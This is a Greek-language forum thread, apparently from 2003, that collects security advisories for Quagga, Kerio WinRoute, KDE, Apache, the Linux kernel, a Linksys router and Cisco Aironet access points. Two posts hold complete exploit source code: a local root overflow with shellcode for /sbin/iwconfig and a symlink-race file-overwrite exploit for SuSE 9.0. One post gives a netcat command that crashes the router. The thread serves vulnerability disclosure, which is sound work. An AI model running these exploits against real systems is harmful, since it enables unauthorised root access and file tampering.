# Software > Ασφάλεια >  Επίπεδο δικτύου

## Mick Flemm

Εδώ θα postάρονται θέματα που αφορούν γνωστά προγράμματα για firewalls, routing κλπ, ανεξαρτήτως λειτουργικού καθώς και vulnerabilities λειτουργικών...

----------


## Mick Flemm

*Quagga*

Από την bugtraq list της Security Focus... 

Summary: 
-------- 
All versions of Quagga (and also GNU Zebra, from which Quagga was 
forked) are vulnerable to a remotely triggerable denial of 
service. 

Scope of vulnerability: 
----------------------- 
All versions of GNU Zebra and all versions of Quagga /prior/ to 
0.96.4, where a daemon's vty, ie the telnet CLI, is accessible to 
hostile parties. 

Impact: 
------- 
Affected daemons can be made to crash by sending a malformed telnet 
command. 

Description: 
------------ 
The vty layer, when processing the telnet sub-negotiation ends 
marker, SE, does not check whether there is sub-negotiation in 
progress, and hence will attempt to dereference a (typically) NULL 
pointer causing the daemon to crash. 

*Workaround: 
----------- 
Restrict access to daemon's telnet CLI, by either configuring each 
daemon's vty with an appropriate access-class and access-list, or by 
some external firewalling application. 
Alternatively, disable external vty access completely by removing the 
vty password (and restarting) or passing the '-P 0' parameters to the 
daemon. 

Solution: 
----------- 
Quagga version 0.96.4 contains a fix for this bug. Alternatively, one 
can manually apply the fix to whichever sources one uses currently. 
(See the RedHat bugzilla entry referenced below for the fix).* 

Credits: 
-------- 
Thanks to Jonny Robertson <jonny AT prophecy.net.nz> for finding 
and reporting this bug and Jay Fenlason <fenlason AT redhat.com> for 
fixing the bug. 

References: 
---------- 
RedHat Advisory RHSA-2003:307-09, 
http://rhn.redhat.com/errata/RHSA-2003-307.html 
RedHat Bugzilla entry 107140, 
http://bugzilla.redhat.com/bugzilla/sho ... ?id=107140 
CAN-2003-0795 

Footnote: 
--------- 
The RedHat Advisory references a second vulnerability in GNU Zebra 
and Quagga, regarding the zebra daemon accepting netlink messages 
from any user. This vulnerability will be dealt with as soon as 
possible. 
regards, 


-- 
Paul Jakma [email protected] [email protected] Key ID: 64A2FF6A 
warning: do not ever send email to [email protected] 
Fortune: 
Factorials were someone's attempt to make math LOOK exciting.[/b]

----------


## Mick Flemm

*Wireless Tools*

13/11/2003 

************************************************************ 
iwconfig is a tool that manipulate the basic wireless parameters, allowing 
privilege escalation due to buffer overflow vulnerability. The iwconfig is 
not setuid by default, but I have seen in several places it was. The flowing 
exploit has been released to test your servers. 



```
/* 
  Name: iw-config.c 
  Copyright: !sh2k+!tc2k 
  Author: heka 
  Date: 11/11/2003 
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, 
dunric, termid, kewlcat, JiNKS 
  Description: /sbin/iwconfig - local root exploit 
  iwconfig manipulate the basic wireless parameters 
  
*/
 

#include <stdio.h> 

#define BIN     "/sbin/iwconfig" 
unsigned char shellcode[] = 
                  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e" 
  "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3" 
  "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0" 
  "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f" 
  "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb" 
  "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb" 
  "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" 
  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd" 
  "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80"; 
int 
main () 
{ 
   int x; 
   char buf[97], out[1337], *buffer; 
   unsigned long ret_add = 0xbffffbb8, *add_ptr ; 
   buffer = buf; 
   add_ptr = (long *)buffer; 
   for (x=0; x<97-1; x+=4) 
   *(add_ptr++)=ret_add; 
   memset ((char *)out, 0x90, 1337); 
   memcpy ((char *)out + 333, shellcode, strlen(shellcode)); 
   memcpy((char *)out, "OUT=", 4); 
   putenv(out); 
   execl (BIN, BIN, buf, NULL); 
   return 0; 
}
```

*************************************************************

----------


## Mick Flemm

*Kerio Winroute Firewall 5.10* 

Vendor: Kerio Technologies Inc. 
Vendor Site: http://www.kerio.com 
Remote: Yes 
Exploitable: Yes 
Risk level: Critical (if proxy requires authentication) 
Authors: Alexander Antipov & 3APA3A (aka Pig Killer) 
Authors Sites: http://www.securitylab.ru http://www.security.nnov.ru 

Intro: 
Winroute is most popular SOHO software firewall/router/Proxy solution 
for Windows platform. 

Vulnerability: 
During troubleshooting of Winroute a security related problem was 
discovered allowing remote website to obtain cleartext credentials 
(username :Stick Out Tongue: assword) of WinRoute user. 

Details: 

WinRoute has extremely weak functionality as a proxy server. It doesn't 
rebuild request sent by browser. Instead, it only changes Proxy- related 
header by substituting fist character to X (So, for example, 
Proxy-Connection header becomes Xroxy-Connection: in outgoing request). 
It leads to few troubles. First, it leaks HTTP established connections. 

Every file (for exmple .gif, html, jpg) from web server requires 
separate connection resulting in performance degradation. But, of cause, 
security related problem is in handling Proxy-Authorization: header sent 
by browser. Browser sends this header with every request in a case proxy 
server requires authentication. This header contains base64-encoded 
username and password of proxy user in cleartext (NTLM and Kerberos 
probably is not supported by WinRoute). If WinRoute uses windows 
authentication this credentials contain domain account information. 

As a result, any webserver visited by WinRoute user can track his proxy 
username and password by Xroxy-Authorization: header (X because first 
character is changed). For example 
Xroxy-Authorization: Basic dGVzdDp0ZXN0aW5n 
(test:testing). 

Workaround: 
*Disable proxy authentication* 

Greets: 
to Ink-Visitor who still awaiting for his document from Pig.

----------


## Mick Flemm

*Open BSD*

once again i am honored to present you a generic and robust way to own
OpenBSD 2.x-3.x, enjoy  :: 

it is quite funny to name ring 0 overflow patches as "reliability fixes".
who does theo thinks he is fooling ? kiddies in his cult ?

you can patch your useless/old openbsd systems by visiting;
http://www.gentoo.org
http://www.grsecurity.net
*
**************************************
Added by M.F.

Το Grsecurity καθώς και το SE Linux (αν και το δεύτερο είναι λιγάκι ποιό περίεργο/πολύπλοκο) είναι Kernel Patches που συνοδεύονται από user-space programs και κάνουν ποιό σκληρό το administration του συστήματος, δεν υπάρχουν μόνο για BSD αλλά και για linux οπότε, όποιος ενδιαφέρεται να ψαχτεί ας ρίξει μιά ματιά στα αντίστοιχα site (το http://www.gentoo.org είναι μία διανομή του Linux που έχει από τη μάνα της support για όλα αυτά, εγώ την έχω τώρα εδωπέρα και την εξετάζω, δεν είναι και ότι καλύτερο από άποψη ευκολίας αλλά από ασφάλεια λέει  )
**************************************
*
- noir


from http://www.wideopenbsd.org/errata.html

All architectures

005: RELIABILITY FIX: November 4, 2003
It is possible for a local user to cause a system panic by executing
a specially crafted binary with an invalid header.
A source code patch exists which remedies the problem.


reliability ??? ehh ;-P yeah yeah right!

----------


## Mick Flemm

*Τα παρακάτω πακέτα έγιναν update και σε άλλες διανομές οπότε ψάξτε το πακέτο για τη διανομή σας...
*
- ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-01
- ---------------------------------------------------------------------------

GLSA: 200311-01
package: kde-base/kdebase
summary: KDM vulnerabilities
severity: normal
Gentoo bug: 29406
date: 2003-11-15
CVE: CAN-2003-0690 CAN-2003-0692
exploit: local / remote
affected: <=3.1.3
fixed: >=3.1.4

DESCRIPTION:

Firstly, versions of KDM <= 3.1.3 are vulnerable to a privilege escalation
bug with a specific configuration of PAM modules. Users who do not use PAM
with KDM and users who use PAM with regular Unix crypt/MD5 based
authentication methods are not affected.

Secondly, KDM uses a weak cookie generation algorithm. It is advised that
users upgrade to KDE 3.1.4, which uses /dev/urandom as a non-predictable
source of entropy to improve security.

Please look at http://www.kde.org/info/security/adviso ... 0916-1.txt for
the KDE Security Advisory and source patch locations for older versions of
KDE.

SOLUTION:

Users are encouraged to perform an 'emerge --sync' and upgrade the package to
the latest available version. KDE 3.1.4 is recommended and should be marked
stable for most architectures. Specific steps to upgrade:

emerge --sync
emerge '>=kde-base/kde-3.1.4'
emerge clean

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQE/vG2Wnt0v0zAqOHYRAr5xAKCedNRDPeH8sbW3EyX6OOSHJOL6VQCgr0ul
fnlFstGhIw3hMdoQIp07/SI=
=QD6a
-----END PGP SIGNATURE-----

- ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200310-04
- ---------------------------------------------------------------------------

PACKAGE : net-www/apache
SUMMARY : buffer overflow
DATE : Fri Oct 31 07:59:00 UTC 2003
EXPLOIT : local
VERSIONS AFFECTED : <apache-2.0.48
FIXED VERSION : >=apache-2.0.48
GENTOO BUG : http://bugs.gentoo.org/show_bug.cgi?id=32271
CVE : CAN-2003-0789 CAN-2003-0542

- ---------------------------------------------------------------------------

Quote from <http://www.apache.org/dist/httpd/Announcement2.html>:

This version of Apache is principally a bug fix release. A summary of
the bug fixes is given at the end of this document. Of particular note
is that 2.0.48 addresses two security vulnerabilities:

mod_cgid mishandling of CGI redirect paths could result in CGI output
going to the wrong client when a threaded MPM is used.
[CAN-2003-0789]

A buffer overflow could occur in mod_alias and mod_rewrite when a
regular expression with more than 9 captures is configured.
[CAN-2003-0542]

This release is compatible with modules compiled for 2.0.42 and later
versions. We consider this release to be the best version of Apache
available and encourage users of all prior versions to upgrade.


SOLUTION

It is recommended that all Gentoo Linux users who are running
net-misc/apache 2.x upgrade:

emerge sync
emerge '>=net-www/apache-2.0.48'
emerge clean

Please remember to update your config files in /etc/apache2
as --datadir has been changed to /var/www/localhost.

Note that a forthcoming GLSA-200310-03 will address similar issues
in Apache 1.x.


// end

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQE/ohjbnt0v0zAqOHYRAlmaAJ0cLO512mWAXfUP5I/2HZGx0FI3dgCgmPlv
KSJYnPXDC4WjlleSR+mo2Go=
=oy6h
-----END PGP SIGNATURE-----


- ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200310-03
- ---------------------------------------------------------------------------

PACKAGE : net-www/apache
SUMMARY : buffer overflow
DATE : Tue Oct 28 16:43:46 UTC 2003
EXPLOIT : local
VERSIONS AFFECTED : <apache-1.3.29
FIXED VERSION : >=apache-1.3.29
CVE : CAN-2003-0542 (under review at time of GLSA)

- ---------------------------------------------------------------------------

Quote from <http://httpd.apache.org/dev/dist/Announcement>:

This version of Apache is principally a bug and security fix release.
A partial summary of the bug fixes is given at the end of this document.
A full listing of changes can be found in the CHANGES file. Of
particular note is that 1.3.29 addresses and fixes 1 potential
security issue:

o CAN-2003-0542 (cve.mitre.org)
Fix buffer overflows in mod_alias and mod_rewrite which occurred if
one configured a regular expression with more than 9 captures.

We consider Apache 1.3.29 to be the best version of Apache 1.3 available
and we strongly recommend that users of older versions, especially of
the 1.1.x and 1.2.x family, upgrade as soon as possible. No further
releases will be made in the 1.2.x family.


SOLUTION

It is recommended that all Gentoo Linux users who are running
net-misc/apache 1.x upgrade:

emerge sync
emerge -pv apache
emerge '>=net-www/apache-1.3.29'
emerge clean
/etc/init.d/apache restart


// end

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQE/vGZWnt0v0zAqOHYRAnnUAKCf7j5ZciPl2A/lfT2G6re9L0ZjugCfQGYk
RyV+5R/BFsdAzsMYZp9dT8A=
=ym4e
-----END PGP SIGNATURE

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-07
- - ---------------------------------------------------------------------------

GLSA: 200311-07
package: net-libs/libnids
summary: Libnids remote code execution
severity: normal
Gentoo bug: 32724
date: 2003-11-22
CVE: CAN-2003-0850
exploit: remote
affected: <=1.17
fixed: >=1.18

DESCRIPTION:


There is a bug in the part of libnids code responsible for TCP reassembly.
The flaw probably allows remote code execution.


SOLUTION:


It is recommended that all Gentoo Linux users who are running
net-libs/libnids update their systems as follows:

emerge sync
emerge '>=net-libs/libnids-1.18'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi78yqksfcnuCQURAmKjAJ0Y/K8Q8mbiwIvQCx44fgpNP0izoACfe4J0
q9x9uKfldu1ES92a1WP9Dyg=
=t5vz
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-06
- - ---------------------------------------------------------------------------

GLSA: 200311-06
package: dev-php/phpsysinfo
summary: phpSysInfo directory traversal
severity: normal
Gentoo bug: 26782
date: 2003-11-22
CVE: CAN-2003-0536
exploit: local
affected: <=2.1
fixed: >=2.1-r1

DESCRIPTION:


phpSysInfo contains two vulnerabilities which could allow local files to be
read or arbitrary PHP code to be executed, under the privileges of the web
server process.


SOLUTION:


It is recommended that all Gentoo Linux users who are running
dev-php/phpsysinfo upgrade to the fixed version:

emerge sync
emerge '>=dev-php/phpsysinfo-2.1-r1'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi8LyqksfcnuCQURAmwWAJ9Ry7D8VrFpf1o2NuzqUXYsw0f8BwCfe7RV
01JaCZoERigxYEwopTsOp2U=
=MOHk
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-05
- - ---------------------------------------------------------------------------

GLSA: 200311-05
package: sys-libs/glibc
summary: Glibc getgrouplist buffer overrun vulnerability
severity: normal
Gentoo bug: 33383
date: 2003-11-22
CVE: CAN-2003-0689
affected: <=2.2.4
fixed: >=2.2.5

DESCRIPTION:


A bug in the getgrouplist function can cause a buffer overflow if the size of
the group list is too small to hold all the user's groups. This overflow can
cause segmentation faults in user applications. This vulnerability exists
only when an administrator has placed a user in a number of groups larger
than that expected by an application. 


SOLUTION:


It is recommended that all Gentoo Linux users update their systems as
follows:

emerge sync
emerge '>=sys-libs/glibc-2.2.5'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi7zyqksfcnuCQURAvuSAJ97zIRL9qlicQB6HYG2jjoQ1Y4SLwCaAg8w
jqF5Mni+HSg5NhrUOnmOQek=
=MDV8
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-04
- - ---------------------------------------------------------------------------

GLSA: 200311-04
package: net-analyzer/ethereal
summary: Security problems in Ethereal 0.9.15
severity: normal
Gentoo bug: 32691
date: 2003-11-22
CVE: none
exploit: remote
affected: <0.9.16
fixed: >=0.9.16

DESCRIPTION:


Quote from <http://www.ethereal.com/appnotes/enpa-sa-00011.html>:

Potential security issues have been discovered in the following protocol
dissectors:

* An improperly formatted GTP MSISDN string could cause a buffer
overflow.

* A malformed ISAKMP or MEGACO packet could make Ethereal or
Tethereal crash.

* The SOCKS dissector was susceptible to a heap overlfow.

Impact:

It may be possible to make Ethereal crash or run arbitrary code
by injecting a purposefully malformed packet onto the wire, or
by convincing someone to read a malformed packet trace file.

Resolution:

Upgrade to 0.9.16.

If you are running a version prior to 0.9.16 and you cannot
upgrade, you can disable the GTP, ISAKMP, MEGACO, and SOCKS
protocol dissectors by selecting Edit->Protocols... and
deselecting them from the list.


SOLUTION:


It is recommended that all Gentoo Linux users who are running
net-analyzer/ethereal 0.9.x upgrade:

emerge sync
emerge '>=net-analyzer/ethereal-0.9.16'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi7qyqksfcnuCQURAtzrAJ9aRrV+aALW2vrSlcdgZmKshnS3kACfVz2E
IZI8yNOWjMb81RRpK6IY+wE=
=IPJD
-----END PGP SIGNATURE-----

----------


## Mick Flemm

*KERNEL*

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-403-1 [email protected]
http://www.debian.org/security/ Wichert Akkerman
December 1, 2003
- ------------------------------------------------------------------------


Package : kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-source-2.4.18
Vulnerability : userland can access full kernel memory 
Problem type : local
Debian-specific: no
CVE Id(s) : CAN-2003-0961

Recently multiple servers of the Debian project were compromised using a
Debian developers account and an unknown root exploit. Forensics
revealed a burneye encrypted exploit. Robert van der Meulen managed to
decrypt the binary which revealed a kernel exploit. Study of the exploit
by the RedHat and SuSE kernel and security teams quickly revealed that
the exploit used an integer overflow in the brk system call. Using
this bug it is possible for a userland program to trick the kernel into
giving access to the full kernel address space. This problem was found
in September by Andrew Morton, but unfortunately that was too late for
the 2.4.22 kernel release.

This bug has been fixed in kernel version 2.4.23 for the 2.4 tree and
2.6.0-test6 kernel tree. For Debian it has been fixed in version
2.4.18-12 of the kernel source packages, version 2.4.18-14 of the i386
kernel images and version 2.4.18-11 of the alpha kernel images.


Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

----------


## Mick Flemm

Linksys WRT54G Denial of Service Vulnerability



System(s)
===========

Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)


Detail(s)
===========

Sending a blank GET request to the router on port 80 (or 8080) halts the embedded webserver. This may allow an attacker to force the owner to reboot the router, allowing them to gain sensitive information during router authentication.

Exploitation
============

[email protected]:~$ nc 10.0.0.1 80
GET
[email protected]:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
[email protected]:~$

Solution(s)
============

- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and performing any authentication.
- Wait for a vendor patch  :: 

Status
============

Vendor contacted on 12/03/03.


!HAPPY HOLIDAYS!
[email protected] - 12/02/03

----------


## Mick Flemm

*SuSE 9.0*

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem 

There is a symlink problem in the 
SuSEconfig.gnome-filesystem 
scribt. a normal user can creat and overwrite every 
file 
on the system. This script gets executed after a 
configuration change by the 
setup tool YaST. So if you have installed gnome or 
parts of gnome check this out. 


When this scribt gets executed by YaST after a 
configuration change it does the following: 

TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM 
mkdir $TEMP 
touch $TEMP/list 
[...] 
echo >$TEMP/found 
[...] 

the env variable $RANDOM includes a random number. 
in my tests 
this number goes up from 1 to 33000. But also if it 
goes up to 
65535 it is still vul. to a symlink attack. this is 
nearly as 
bad as the symlink problem which has been found on 
SuSE 8.2. 
On 8.2 a SuSEconf scribt has created a link with the 
$$ at the 
file end. 

I have used a little exploit written in C which 
creats the 
directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" 
up to 
33000. in every directory i have created a symlink 
to a file 
which i want to creat or to overwrite. as the 
filename i have 
taken the $TEMP/found and let it point to some file. 
in my test i 
have taken the /etc/nologin- and hey- it has worked! 

have phun! 


*******************************************************************/ 
#include <stdio.h> 
#include <unistd.h> 
#include <string.h> 

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." 
#define START 1 
#define END 33000 

int main(int argc, char **argv) 
{ 
int i; 
char buf[150]; 

printf("\tSuSE 9.0 YaST script 
SuSEconfig.gnome-filesystem exploit\n"); 
printf("\t-------------------------------------------------------------
\n"); 
printf("\tdiscovered and written by l0om 
<[email protected]>\n"); 
printf("\t http://WWW.EXCLUDED.ORG\n\n"); 

if(argc != 2) { 
printf("usage: %s <destination-file>\n",argv[0]); 
exit(0xff); 
} 

printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout); 
read(1, buf, 1); fflush(stdin); 

umask(0000); 
printf("working\n\n"); 
for(i = START; i < END; i++) { 
snprintf(buf, sizeof(buf),"%s%d",PATH,i); 
if(mkdir(buf,00777) == -1) { 
fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i); 
exit(0xff); 
} 
if(!(i%1000))printf("."); 
strcat(buf, "/found"); 
if(symlink(argv[1], buf) == -1) { 
fprintf(stderr, "cannot creat symlink from %s to %s 
[Nr.%d]\n",buf,argv[1],i); 
exit(0xff); 
} 
} 
printf("\ndone!\n"); 
printf("next time the SuSE.gnome-filesystem script 
gets executed\n"); 
printf("we will create or overwrite file %s
\n",argv[1]); 
return(0x00); 
} /* i cant wait for the new gobbles comic!! */

----------


## Mick Flemm

*Cisco APs !!!*


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Cisco Security Advisory: SNMP trap Reveals WEP Key in Cisco Aironet AP

Revision 1.0

For Public Release 2003 December 02 17:00 UTC (GMT)

- ------------------------------------------------------------------------

Summary
=======
Cisco Aironet Access Points (AP) running Cisco IOS software will send
any static Wired Equivalent Privacy (WEP) key in the cleartext to the
Simple Network Management Protocol (SNMP) server if the snmp-server
enable traps wlan-wep command is enabled. Affected hardware models are
the Cisco Aironet 1100, 1200, and 1400 series. This command is disabled
by default. The workaround is to disable this command. Any dynamically
set WEP key will not be disclosed.

Cisco Aironet AP models running VxWorks operating system are not
affected by this vulnerability. No other Cisco product is affected.

This advisory will be available at
http://www.cisco.com/warp/public/707/ci ... trap.shtml

Affected Products
=================
Cisco Aironet Access Point 1100, 1200 and 1400 series running Cisco IOS
are affected. The Cisco AP 350 running Cisco IOS software is not
affected. An Access Points running VxWorks based Operating System are
not affected.

To determine if you are running Cisco IOS software, type this command on
your workstation, replacing "10.0.0.1" with the IP address of your AP.
host%telnet 10.0.0.1

If you are not presented with a menu in a graphic form but simply with a
prompt (e.g., ap1200%) then you may be vulnerable.

To further confirm that you are running Cisco IOS software, type the
show version command at the prompt. If the result of the command is
similar to the example below, then you are running Cisco IOS software.
ap1200>show version
Cisco Internetwork Operating System Software
IOS (tm) C1200 Software (C1200-K9W7-M), Version 12.2(11)JA1, EARLY
DEPLOYMENT RELEASE SOFTWARE (fc1)
TAC Support: http://www.cisco.com/tac
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Mon 07-Jul-03 13:48 by ccai
Image text-base: 0x00003000, data-base: 0x004D46F4

If you have determined that Cisco IOS software is being used on the AP,
execute the following command.
ap1200#show running
.
.
.
.
snmp-server enable traps tty
snmp-server enable traps dot11-qos
snmp-server enable traps wlan-wep <<<<<<
....

If your configuration contains the line marked with <<, then you are
vulnerable.

Details
=======
If enabled, the snmp-server enable traps wlan-wep command will send
static WEP keys in cleartext to the SNMP server every time a key is
changed or AP rebooted. This vulnerability is opportunistic and, the
following conditions must be met for the vulnerability to be exploited.


* A snmp-server enable traps wlan-wep must be enabled. (It is disabled
by default.)
* An adversary must be able to intercept SNMP packets sent from the AP
to the SNMP server.
* The AP in question must be rebooted or static WEP key changed.

Under these circumstances, an adversary will be able to intercept all
static WEP keys.

Dynamically configured WEP keys are not affected by this vulnerability
and they will not revealed. A WEP key is dynamically configured if you
are using one of the Extensible Authentication Protocol (EAP)
authentication protocols. The following EAP protocols are currently
supported in Cisco APs: LEAP, EAP-TLS, PEAP, EAP-MD5, and EAP-SIM.

This vulnerability is assigned Cisco bug ID CSCec55538.

Impact
======
By being able to intercept a static WEP key, an attacker can drastically
reduce the effort to break WEP encryption. Please note that this is true
only for cases in which you are not using one of the EAP protocols but
are using only static WEP keys.

Software Versions and Fixes
===========================
The vulnerable IOS releases are: 12.2( :: JA, 12.2(11)JA and 12.2(11)JA1.

The first fixed release is 12.2(13)JA1.

Obtaining Fixed Software
========================
Cisco is offering free software upgrades to remedy this vulnerability
for all affected customers. Customers may only install and expect
support for the feature sets they have purchased.

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers whose Cisco products are provided or maintained through prior
or existing agreement with third-party support organizations such as
Cisco Partners, authorized resellers, or service providers should
contact that support organization for assistance with the upgrade, which
should be free of charge.

Customers who purchase direct from Cisco but who do not hold a Cisco
service contract and customers who purchase through third-party vendors
but are unsuccessful at obtaining fixed software through their point of
sale should get their upgrades by contacting the Cisco Technical
Assistance Center (TAC). In those cases, customers may only upgrade to a
later version of the same release as indicated by the applicable row in
the Software Versions and Fixes table. TAC contacts are as follows:


* +1 800 553 2447 (toll-free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* email: [email protected].

See http://www.cisco.com/warp/public/687/Di ... rTAC.shtml for
additional TAC contact information, including special localized
telephone numbers and instructions and e-mail addresses for use in
various languages.

Please have your product serial number available and give the URL of
this notice as evidence of your entitlement to a free upgrade. Free
upgrades for non-contract customers must be requested through the TAC.

Please do not contact either "[email protected]" or
"[email protected]" for software upgrades

Workarounds
===========
The workaround is to disable the associated SNMP trap command by typing
the following global command:
ap1200(config)#no snmp-server enable traps wlan-wep

While the above command will stop the AP from sending your WEP key,
Cisco recommends that you do not use static WEP keys but some of the EAP
authentication protocols supported by the AP. The WEP scheme itself has
several severe drawbacks. For more details regarding wireless LAN
security, please see
http://www.cisco.com/warp/public/779/sm ... ity.shtml/.
The papers there are regarding general wireless security and provide
configuration examples.

Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory. This
vulnerability was discovered by Bill Van Devender.

Status of This Notice: FINAL
============================
This is a final advisory. Although Cisco cannot guarantee the accuracy
of all statements in this advisory, all of the facts have been checked
to the best of our ability. Cisco does not anticipate issuing updated
versions of this advisory unless there is some material change in the
facts. Should there be a significant change in the facts, Cisco will
update this advisory.

A stand-alone copy or paraphrase of the text of this security advisory
that omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain factual
errors.

Distribution
============
This notice will be posted on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/ci ... trap.shtml.
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients:


* [email protected]
* [email protected] (includes CERT/CC)
* [email protected]
* [email protected]
* [email protected]
* [email protected]
* [email protected]
* comp.dcom.sys.cisco
* Various internal Cisco mailing lists

Future updates of this notice, if any, will be placed on Cisco's
worldwide web Users concerned about this problem are encouraged to check
the URL given above for any updates.

Revision History
================
+---------+-----------+--------------------------------------------+
|Revision |2003-Dec-02|Initial public release. |
|1.0 | | |
+---------+-----------+--------------------------------------------+

Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and registering
to receive security information from Cisco, is available on Cisco's
worldwide website at http://www.cisco.com/warp/public/707/
sec_incident_response.shtml. This includes instructions for press
inquiries regarding Cisco security notices. All Cisco Security
Advisories are available at http://www.cisco.com/go/psirt.
- ------------------------------------------------------------------------

This notice is Copyright 2003 by Cisco Systems, Inc. This notice may be
redistributed freely after the release date given at the top of the
text, provided that redistributed copies are complete and unmodified,
and include all date and version information.
- ------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Cygwin)

iD8DBQE/zJu8ezGozzK2tZARAmiYAKDXu3yHFcy+TUigkwwbGQKdjQqYRgCgocC6
rmM4iYh8h84afbdOEljk/eg=
=mwKf
-----END PGP SIGNATURE-----

----------


## Mick Flemm

Deprecated...

----------

